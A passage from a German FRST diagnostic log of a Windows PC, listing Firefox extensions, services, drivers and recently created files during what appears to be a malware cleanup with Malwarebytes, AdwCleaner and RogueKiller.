FF Extension: (Deaktivierungs-Add-on von Google Analytics) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{6d96bb5e-1175-4ebf-8ab5-5f56f1c79f65}.xpi [2020-04-16] [UpdateUrl:hxxps://tools.google.com/service/update2/ff?guid=%ITEM_ID%&version=%ITEM_VERSION%&application=%APP_ID%&appversion=%APP_VERSION%]
FF Extension: (Video DownloadHelper) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-03-31]
FF Extension: (Ecosia – Die Suchmaschine, die Bäume pflanzt) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}.xpi [2019-09-08]
FF HKLM\...\Firefox\Extensions: [{9ea472d6-41d7-49db-bb40-1c8306a23129}] - C:\Program Files (x86)\twengoo\ff\twengoo-1.0.0-fx.xpi
FF Extension: (Twengoo) - C:\Program Files (x86)\twengoo\ff\twengoo-1.0.0-fx.xpi [2019-09-22]
FF HKLM-x32\...\Firefox\Extensions: [{9ea472d6-41d7-49db-bb40-1c8306a23129}] - C:\Program Files (x86)\twengoo\ff\twengoo-1.0.0-fx.xpi
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [Keine Datei]
FF Plugin: @videolan.org/vlc,version=2.2.8 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.10 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.11 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.3 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.cpdf -> d:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Keine Datei]
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> d:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Keine Datei]
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> d:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Keine Datei]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [Keine Datei]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [Keine Datei]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-11-19] (Adobe Inc. -> Adobe Systems Inc.)

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8567960 2020-03-24] (BattlEye Innovations e.K. -> )
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9057136 2020-11-04] (Microsoft Corporation -> Microsoft Corporation)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [784512 2020-03-14] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S3 GameforgeClientService; C:\Program Files (x86)\GameforgeClient\gfservice.exe [562848 2020-08-06] (Gameforge 4D GmbH -> )
R2 HauppaugeTVServer; d:\WinTV8\TVServer\HauppaugeTVServer.exe [586536 2017-06-08] (Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert]
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7269976 2020-12-02] (Malwarebytes Inc -> Malwarebytes)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2523448 2020-11-23] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3478336 2020-11-23] (Electronic Arts, Inc. -> Electronic Arts)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-08-13] (Geek Software GmbH -> Geek Software GmbH)
R2 PlexUpdateService; D:\Plex Media Server\Plex Update Service.exe [2209256 2018-02-15] (Plex, Inc -> Plex, Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5101992 2020-11-11] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 StarMoney 11 OnlineUpdate; C:\Program Files (x86)\StarMoney 11\ouservice\StarMoneyOnlineUpdate.exe [750296 2019-10-28] (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
R2 StarMoney 12 Basic OnlineUpdate; C:\Program Files (x86)\StarMoney 12 Basic\ouservice\StarMoneyOnlineUpdate.exe [762160 2020-10-22] (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
R2 TVGOnlineUpdateSvc; C:\Program Files (x86)\TVG\OnlineUpdate\OnlineUpdateSvc.exe [398128 2010-12-14] (TVG Telefon- und Verzeichnisverlag GmbH & Co. KG -> )
R2 UsbClientService; c:\Program Files (x86)\Synology\Assistant\UsbClientService.exe [248856 2017-08-08] (Synology Inc. -> ) [Datei ist nicht signiert]
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\NisSrv.exe [2467088 2020-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MsMpEng.exe [128376 2020-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WsAppService3; C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe [83232 2019-06-26] (Wondershare Technology Co.,Ltd -> Wondershare)
R2 WsDrvInst; D:\Program Files (x86)\Wondershare\drfone\Library\DriverInstaller\DriverInstall.exe [130336 2019-06-26] (Wondershare Technology Co.,Ltd -> Wondershare)

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2014-09-09] (ASUSTeK Computer Inc. -> )
R3 busenum; C:\WINDOWS\System32\drivers\busenum.sys [57824 2012-08-03] (Synology Inc. -> Windows (R) Win 7 DDK provider)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [153312 2020-12-02] (Malwarebytes Corporation -> Malwarebytes)
R3 HCW85BDA; C:\WINDOWS\system32\drivers\HCW85BDA.sys [2265832 2017-06-19] (Hauppauge Computer Works Inc. -> Hauppauge Computer Works)
R3 hcw85cir; C:\WINDOWS\system32\drivers\hcw85cir4.sys [79600 2017-06-19] (Hauppauge Computer Works Inc. -> Hauppauge Computer Works, Inc.)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [220160 2020-12-03] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [19912 2020-12-02] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\System32\DRIVERS\farflt.sys [197792 2020-12-03] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [77496 2020-12-03] (Malwarebytes Inc -> Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248968 2020-12-02] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [138904 2020-12-03] (Malwarebytes Inc -> Malwarebytes)
S3 RzDev_0203; C:\WINDOWS\System32\drivers\RzDev_0203.sys [51688 2018-04-22] (Razer USA Ltd. -> Razer Inc)
S3 RzDev_0306; C:\WINDOWS\System32\drivers\RzDev_0306.sys [51776 2019-09-19] (Razer USA Ltd. -> Razer Inc)
U5 rzudd; C:\Windows\System32\Drivers\rzudd.sys [204824 2016-10-30] (Razer USA Ltd. -> Razer Inc)
R3 SteamStreamingMicrophone; C:\WINDOWS\system32\drivers\SteamStreamingMicrophone.sys [40736 2017-07-28] (Valve Corp. -> )
R3 SteamStreamingSpeakers; C:\WINDOWS\system32\drivers\SteamStreamingSpeakers.sys [40736 2017-07-21] (Valve Corp. -> )
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [48536 2020-11-06] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [429288 2020-11-06] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [71912 2020-11-06] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2020-12-03 21:22 - 2020-12-03 21:22 - 000000000 ____D C:\Users\Tom\AppData\LocalLow\IGDump
2020-12-03 17:00 - 2020-12-03 17:00 - 000001278 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2020-12-03 17:00 - 2020-12-03 17:00 - 000001266 _____ C:\Users\Public\Desktop\Mozilla Thunderbird.lnk
2020-12-03 17:00 - 2020-12-03 17:00 - 000001266 _____ C:\ProgramData\Desktop\Mozilla Thunderbird.lnk
2020-12-03 17:00 - 2020-12-03 17:00 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2020-12-03 16:54 - 2020-12-03 16:54 - 000002234 _____ C:\Users\Tom\Desktop\RogueKiller.txt
2020-12-03 16:47 - 2020-12-03 16:53 - 000000000 ____D C:\ProgramData\RogueKiller
2020-12-03 16:44 - 2020-12-03 16:44 - 000197792 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2020-12-03 16:44 - 2020-12-03 16:44 - 000138904 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2020-12-03 16:44 - 2020-12-03 16:44 - 000077496 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2020-12-03 16:41 - 2020-12-03 16:41 - 000052274 _____ C:\Users\Tom\Desktop\adwclean.pdf
2020-12-03 16:37 - 2020-12-03 16:37 - 031031352 _____ C:\Users\Tom\Desktop\RogueKiller64.exe
2020-12-03 16:36 - 2020-12-03 16:43 - 000000000 ____D C:\AdwCleaner
2020-12-03 16:35 - 2020-12-03 16:35 - 000007190 _____ C:\Users\Tom\Desktop\MBAM.txt
2020-12-03 16:28 - 2020-12-03 16:28 - 008447152 _____ (Malwarebytes) C:\Users\Tom\Desktop\adwcleaner_8.0.8.exe
2020-12-03 16:23 - 2020-12-03 16:23 - 000220160 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamChameleon.sys
2020-12-02 22:56 - 2020-12-02 22:56 - 000048512 _____ C:\Users\Tom\Desktop\Addition.txt
2020-12-02 22:55 - 2020-12-03 22:04 - 000023526 _____ C:\Users\Tom\Desktop\FRST.txt
2020-12-02 22:49 - 2020-12-03 22:01 - 000006670 _____ C:\Users\Tom\Desktop\Search.txt
2020-12-02 22:43 - 2020-12-02 22:44 - 000005841 _____ C:\Users\Tom\Desktop\Fixlog.txt
2020-12-02 22:43 - 2020-12-02 22:43 - 000000000 ____D C:\Users\Tom\AppData\Local\PeerDistRepub
2020-12-02 22:37 - 2020-12-02 22:37 - 000132833 _____ C:\Users\Tom\Desktop\Updater.pdf
2020-12-02 22:25 - 2020-12-02 22:26 - 000081337 _____ C:\Users\Tom\Desktop\Additiona.txt
2020-12-02 21:38 - 2020-12-02 22:26 - 000068680 _____ C:\Users\Tom\Desktop\FRSTa.txt
2020-12-02 21:38 - 2020-12-02 21:38 - 000000000 ____D C:\Users\Tom\Desktop\FRST-OlderVersion
2020-12-02 21:37 - 2020-12-03 22:03 - 000000000 ____D C:\FRST
2020-12-02 21:37 - 2020-12-02 21:38 - 002288640 _____ (Farbar) C:\Users\Tom\Desktop\FRST64.exe
2020-12-02 21:35 - 2020-12-02 21:35 - 000010256 _____ C:\Users\Tom\Desktop\2020_12_02 Malwarebyte.txt
2020-12-02 21:31 - 2020-12-02 21:31 - 000002033 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2020-12-02 21:31 - 2020-12-02 21:31 - 000002021 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2020-12-02 21:31 - 2020-12-02 21:31 - 000002021 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2020-12-02 21:31 - 2020-12-02 21:31 - 000000000 ____D C:\Users\Tom\AppData\Local\mbam
2020-12-02 21:30 - 2020-12-02 21:30 - 000248968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2020-12-02 21:30 - 2020-12-02 21:30 - 000153312 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae64.sys
2020-12-02 21:30 - 2020-12-02 21:30 - 000019912 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MbamElam.sys
2020-12-02 21:30 - 2020-12-02 21:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-12-02 21:30 - 2020-12-02 21:30 - 000000000 ____D C:\Program Files\Malwarebytes
2020-12-02 21:06 - 2020-12-02 21:06 - 000030894 _____ C:\Users\Tom\Desktop\Vodafone - Network Abuse Report.html
2020-12-02 21:06 - 2020-12-02 21:06 - 000000000 ____D C:\Users\Tom\Desktop\Vodafone - Network Abuse Report-Dateien
2020-11-28 20:30 - 2020-11-28 20:30 - 000000000 ____D C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2020-11-28 20:27 - 2020-11-28 20:27 - 000000020 ___SH C:\Users\Vincent\ntuser.ini
2020-11-28 19:48 - 2020-12-02 22:38 - 000061440 _____ C:\Users\Tom\AppData\Roaming\cookies.sqlite
2020-11-28 13:27 - 2020-11-28 13:27 - 000001377 _____ C:\Users\Public\Desktop\Command and Conquer Generals and Zero Hour.lnk
2020-11-28 13:27 - 2020-11-28 13:27 - 000001377 _____ C:\ProgramData\Desktop\Command and Conquer Generals and Zero Hour.lnk
2020-11-28 13:27 - 2020-11-28 13:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Command and Conquer Generals and Zero Hour
2020-11-24 10:54 - 2020-11-24 10:54 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-11-16 10:30 - 2020-11-16 10:30 - 000000020 ___SH C:\Users\Tom_Admin\ntuser.ini
2020-11-16 10:30 - 2020-11-16 10:30 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garmin
2020-11-11 07:09 - 2020-11-11 07:09 - 000266240 _____ C:\WINDOWS\SysWOW64\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-11-11 07:09 - 2020-11-11 07:09 - 000009265 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2020-11-11 07:08 - 2020-11-11 07:08 - 000363520 _____ C:\WINDOWS\system32\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-11-11 07:08 - 2020-11-11 07:08 - 000197632 _____ C:\WINDOWS\system32\IHDS.dll
2020-11-11 07:08 - 2020-11-11 07:08 - 000152576 _____ C:\WINDOWS\system32\EoAExperiences.exe
2020-11-10 11:03 - 2020-12-03 16:49 - 001722788 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-11-10 11:01 - 2020-11-28 10:15 - 000003606 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6b7481de5e69e
2020-11-10 11:01 - 2020-11-10 11:01 - 000000000 ____D C:\ProgramData\Microsoft OneDrive
2020-11-10 11:00 - 2020-11-10 11:00 - 000000020 ___SH C:\Users\Tom\ntuser.ini
2020-11-10 10:59 - 2020-12-03 16:44 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-11-10 10:59 - 2020-11-28 20:29 - 000003382 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3451750051-380284315-2914928687-1003
2020-11-10 10:59 - 2020-11-28 20:28 - 000004256 _____ C:\WINDOWS\system32\Tasks\Opera GX scheduled Autoupdate 1581624516
2020-11-10 10:59 - 2020-11-28 10:15 - 000003700 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-11-10 10:59 - 2020-11-25 08:33 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-11-10 10:59 - 2020-11-16 10:30 - 000003650 _____ C:\WINDOWS\system32\Tasks\GarminUpdaterTask
2020-11-10 10:59 - 2020-11-10 10:59 - 000015243 _____ C:\WINDOWS\diagwrn.xml
2020-11-10 10:59 - 2020-11-10 10:59 - 000015243 _____ C:\WINDOWS\diagerr.xml
2020-11-10 10:59 - 2020-11-10 10:59 - 000003558 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2020-11-10 10:59 - 2020-11-10 10:59 - 000003404 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-11-10 10:59 - 2020-11-10 10:59 - 000003334 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2020-11-10 10:59 - 2020-11-10 10:59 - 000003220 _____ C:\WINDOWS\system32\Tasks\Intel PTT EK Recertification
2020-11-10 10:59 - 2020-11-10 10:59 - 000003180 _____ C:\WINDOWS\system32\Tasks\klcp_update
2020-11-10 10:59 - 2020-11-10 10:59 - 000003016 _____ C:\WINDOWS\system32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000003016 _____ C:\WINDOWS\system32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000003016 _____ C:\WINDOWS\system32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002984 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002956 _____ C:\WINDOWS\system32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002858 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3451750051-380284315-2914928687-1002
2020-11-10 10:59 - 2020-11-10 10:59 - 000002838 _____ C:\WINDOWS\system32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000002744 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2020-11-10 10:59 - 2020-11-10 10:59 - 000000000 _SHDL C:\Documents and Settings
2020-11-10 10:59 - 2020-11-10 10:59 - 000000000 ____D C:\WINDOWS\system32\Tasks\NCH Software
2020-11-10 10:57 - 2020-11-10 10:57 - 000000368 ____H C:\WINDOWS\Tasks\Intel PTT EK Recertification.job
2020-11-10 10:53 - 2020-12-03 21:53 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-11-10 10:53 - 2020-12-03 16:44 - 000008192 ___SH C:\DumpStack.log.tmp
2020-11-10 10:53 - 2020-11-11 17:52 - 000444272 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-11-10 10:53 - 2020-11-10 11:00 - 000000000 ____D C:\Windows.old
2020-11-10 09:46 - 2020-11-10 10:53 - 000000000 ____D C:\WINDOWS\system32\config\bbimigrate
2020-11-10 09:44 - 2020-12-03 16:30 - 000000000 ____D C:\Users\Vincent
2020-11-10 09:44 - 2020-11-28 20:29 - 000002385 _____ C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-10 09:44 - 2020-11-16 10:30 - 000000000 ____D C:\Users\Tom_Admin
2020-11-10 09:44 - 2020-11-10 11:00 - 000000000 ____D C:\Users\Tom
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Vorlagen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Startmenü
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Netzwerkumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Lokale Einstellungen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Eigene Dateien
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Druckumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Documents\Eigene Videos
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Documents\Eigene Musik
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Documents\Eigene Bilder
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\AppData\Local\Verlauf
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\AppData\Local\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Vincent\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Vorlagen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Startmenü
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Netzwerkumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Lokale Einstellungen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Eigene Dateien
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Druckumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Documents\Eigene Videos
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Documents\Eigene Musik
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Documents\Eigene Bilder
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\AppData\Local\Verlauf
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\AppData\Local\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom_Admin\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Vorlagen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Startmenü
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Netzwerkumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Lokale Einstellungen
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Eigene Dateien
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Druckumgebung
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Documents\Eigene Videos
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Documents\Eigene Musik
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Documents\Eigene Bilder
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\AppData\Local\Verlauf
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\AppData\Local\Anwendungsdaten
2020-11-10 09:44 - 2020-11-10 09:44 - 000000000 _SHDL C:\Users\Tom\Anwendungsdaten
2020-11-10 09:44 - 2019-12-07 10:10 - 000001105 _____ C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-10 09:44 - 2019-12-07 10:10 - 000001105 _____ C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-11-10 09:43 - 2020-11-10 09:46 - 000000000 ____D C:\WINDOWS\ServiceProfiles
2020-11-10 09:42 - 2020-11-10 09:42 - 006012185 _____ C:\Users\Tom\Desktop\2020-11-10_Schwaebische_Zeitung_Laupheim_-_10-11-2020.pdf
2020-11-10 09:42 - 2020-11-10 09:42 - 000000000 ____D C:\ProgramData\ssh
2020-11-10 09:40 - 2020-11-10 09:40 - 004898144 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmpltfm.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 003860832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmpltfm.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2020-11-10 09:40 - 2020-11-10 09:40 - 001822256 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-11-10 09:40 - 2020-11-10 09:40 - 001393472 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2020-11-10 09:40 - 2020-11-10 09:40 - 001354080 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmpal.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 001333248 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 001309504 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2020-11-10 09:40 - 2020-11-10 09:40 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2020-11-10 09:40 - 2020-11-10 09:40 - 001091936 _____ (Microsoft Corporation) C:\WINDOWS\system32\rtmcodecs.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 001032544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ortcengine.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000980320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmpal.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000915296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rtmcodecs.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000732000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ortcengine.dll
2020-11-10 09:40 - 2020-11-10 09:40 - 000611952 _____ C:\WINDOWS\SysWOW64\TextShaping.dll
